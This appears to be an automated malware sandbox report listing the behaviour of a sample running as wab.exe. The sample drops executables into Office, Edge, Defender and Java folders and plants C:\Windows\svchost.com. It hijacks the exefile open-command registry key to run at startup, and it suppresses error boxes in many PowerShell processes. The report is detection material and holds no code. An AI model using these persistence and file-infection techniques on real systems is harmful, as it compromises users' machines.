Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
